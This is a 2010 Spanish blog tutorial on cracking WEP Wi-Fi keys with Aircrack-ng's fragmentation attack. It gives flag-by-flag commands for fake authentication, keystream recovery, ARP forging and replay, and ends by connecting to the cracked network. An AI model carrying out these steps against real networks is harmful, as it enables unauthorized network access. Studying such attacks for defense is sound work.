10 de noviembre de 2010

Suite Aircrack-ng: Fragmentación

Continuando con la entrada anterior Suite Aircrack-ng, y aprovechando nuestra memoria USB cifrada, vamos a seguir describiendo las opciones que tenemos con dicha herramienta. Si recordamos un poco la entrada anterior, realizamos un ataque de reenvio de ARPs. Esto consiste en la injección de dichos paquetes una vez obtenedino un paquete ARP válido para capturar la cantidad de IVs suficientes para descifrar la clave estadístacamente.

Introduccion
Recordando un poco la teoría sobre el algoritmo WEP, debido a la cantidad de bits que componen los vectores de inicicación somos capaces de obtener la secuencia aleatoria de números generados a través de dicho IV y la clave compartida.


Dicha semilla (vector de iniciación) se utiliza junto con la clave compartida para generar el PRGA, a través de RC4, al cual se pasará XOR para cifrar el texto plano con la comprobación CRC32. Simplificando en la siguiente función cryptográfica:


El ataque de fragmentación consiste en localizar un paquete con un pedazo de la clave compartida y utilizarlo con la secuencia conocida de IVs para obtener los 1500 bits del PRGA enviando paquetes ARPs o LLCs fragmentados hasta completar el proceso. El keystream obtenido se guarda en un archivo .xor que podremos utilizar posteriormente.

Ataque Fragment:
Lo primero que debemos hacer es asegurarnos que el NIC wireless está reconocido por el sistema y crear la interfaz en modo monitor que utilizaremos durante el proceso.


Realizamos un escaneo para ver las redes que tenemos accesibles:

airodump-ng --encrypt wep -a mon0

explicación:
--encrypt wep. Filtramos por el tipo de cifrado
-a. Filtramos los clientes no asociados
mon0. Interfaz


Una vez seleccionada la red objetivo, nuevamente ejecutamos el comando aplicando los filtros con los que registrar el tráfico de dicha red. Esto lo conseguimos con:

airodump-ng -w out --bssid 00:13:F7:... -c 7 mon0

explicación:
-w out. Archivo de salida
--bssid 00:13:F7:... La dirección física del AP
-c 7. Canal que utiliza la red
mon0. Interfaz


Ahora pasamos a realizar una falsa autentificación con el comando:

aireplay-ng --fakeauth 10 -a 00:13:F7:... -h 00:11:22:33:44:55 mon0

explicación:
--fakeauth 10. Ataque de falsa asociación
-a 00:13:F7:.... BSSID del AP
-h 00:11:22:33:44:55. MAC del cliente
mon0. Interfaz

Podemos comprobar que el ataque es satisfactorio si aparece el smiley ":-)"


Realizamos el ataque de fragmentación:

aireplay-ng --fragment -b 00:13:F7:... -h 00:11:22:33:44:55 mon0

explicación:
--fragment. Ataque de fragmentación
-b 00:13:F7:.... Dirección MAC del AP
-h 00:11:22:33:44:55. Dirección física del cliente falso
mon0. Interfaz


Empezará a leer los paquetes en busca de un pedazo de clave para formar un paquete ARP o LLC que será fragmentado y enviado al AP hasta que consigamos el keystream de la conexión.


Si todo ha ido bien, dicho proceso nos generará un archivo xor que utilizaremos con packetforge-ng para crear el paquete ARP que injectaremos posteriormente utilizando el ataque ARP-Request.

packetforge-ng --arp -a 00:13:F7:... -h 00:11:22:33:44:55 -k 255.255.255.255. -l 255.255.255.255 -y fragment-1101-153100.xor -w salida

Explicación:
--arp. Tipo de paquete a formar
-a 00:13:F7:.... BSSID de la conexión
-h 00:11:22:33:44:55. Dirección MAC del cliente falso
-k 255.255.255.255. Dirección IP destino*
-l 255.255.255.255. Dirección IP origen*
-y fragment-1101-153100.xor. Paquete con el keystream
-w salida. Nombre del archivo de salida
* Utilizamos una dirección IP broadcast. Por defecto, Aireplay-ng utiliza dicha dirección, tanto origen como destino, en el caso que no sea especificada.


Y lo enviaremos al AP utilizando la replicación ARP con el comando:

aireplay-ng --arpreplay -r salida -x 600 -b 00:13:F7: -h 00:11:22:33:44:55 mon0

Explicación:
--arpreplay. Ataque replicación ARP
-r salida. Archivo de origen
-x 600. Número de paquetes a injectar
-b 00:13:F7:.... BSSID de la red
-h 00:11:22:33:44:55. MAC del cliente falso
mon0. Interfaz


Al final de la salida del comando podemos observar los paquetes que han sido leidos, la cantidad de paquetes ARPs y ACKs, los paquetes enviados y los paquetes por segundo (pps) que se injectan.

En la captura de Airodump podemos comprobar los paquetes que están siendo injectados, los paquetes con IVs capturados y el resto de datos tanto del AP como del cliente.


A los pocos minutos hemos capturado la cantidad suficiente de paquetes para obtener la clave casi sin pestañear....


En la captura anterior podemos observar varias cosas interesantes... El tiempo que ha tardado, las claves probadas, el número de IVs, la clave en hexadecimal y ASCII y el porcentaje de fiabilidad del proceso.

Ahora pasamos a comprobar que la contraseña obtenida es correcta y que tenemos conexión. Primero desactivamos el modo monitor de la tarjeta Wifi



Realizamos la configuración con los datos de la red y realizamos la petición DHCP al servidor



Por último actualizamos la lista de paquetes para comprobar que hay conexión con Internet.


Importante:
La información mostrada en este tutorial describe, a modo de información, técnicas actuales para poner en entredicho la seguridad de las conexiones Wireless. El autor no se hace responsable del uso que pueda darse a dicha información ni de las consecuencias que los lectores puedan provocar a terceras personas.

Enlaces de referencia:
http://www.aircrack-ng.org/doku.php?id=es:fragmentation
http://darkircop.org/bittau-wep.pdf

Un saludo, Brixton Cat.
Publicado por en 20:48:00
Etiquetas: , , , , , ,

No hay comentarios:

Publicar un comentario

Bienvenid= si quieres dejar un comentario

Suscribirse a: Enviar comentarios (Atom)